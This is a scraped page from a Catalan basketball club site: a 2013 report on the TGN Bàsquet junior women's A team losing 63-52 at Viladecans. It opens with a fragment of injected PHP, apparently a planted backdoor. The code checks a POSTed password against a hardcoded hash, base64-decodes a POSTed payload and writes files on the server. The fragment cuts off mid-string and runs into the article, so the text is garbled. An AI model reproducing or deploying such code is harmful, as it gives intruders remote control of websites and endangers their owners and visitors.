function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Un júnior femení A excel·lent és víctima de les lesions i perd a Viladecans (63-52) - Tgn Bàsquet Club -

Un júnior femení A excel·lent és víctima de les lesions i perd a Viladecans (63-52)

Updated: novembre 18, 2013

El júnior femení A del TGN Bàsquet va caure a la pista del Viladecans tot i fer un dels millors partits del curs. El conjunt lila, que arribava al matx amb les baixes de Roda i Gebellí, tampc va poder comptar amb Massagué que va viatjar amb l’equip però que no va poder jugar ni un minut per una lesió al genoll.  Tot i aquest panorama, el TGN Bàsquet va poder dominar el primer quart fins un parcial local d’11-0. El parcial en contra va esperonar les visitants que van fer un segon període de cine. El TGN Bàsquet va trobar la seva identitat amb un atac dinàmic i un gran encert a l’hora de prendre decisions. Tot això va permetre les visitants fer un parcial de 16-26 en aquest període i arribar al descans amb un punt d’avantatge (31-32).

El Viladecans va decidir aleshores fer més rotacions de jugadores per tal d’augmentar el ritme i esgotar les visitants (amb menys jugadores disponibles). El TGN Bàsquet, però, va aguantar molt bé fins que al començament del quart període la visitant Gil va trepitjar una jugadora local i es va torçar el turmell. Els pocs efectius de Crespo, però,van treure l’orgull i, liderats ofensivament per Garcia -amb l’ajuda de Vidal i Giménez- es van posar l’equip a l’esquena. Malauradament, l’esforç va passar factura i el Viladecans, més fresc, va imposar-se.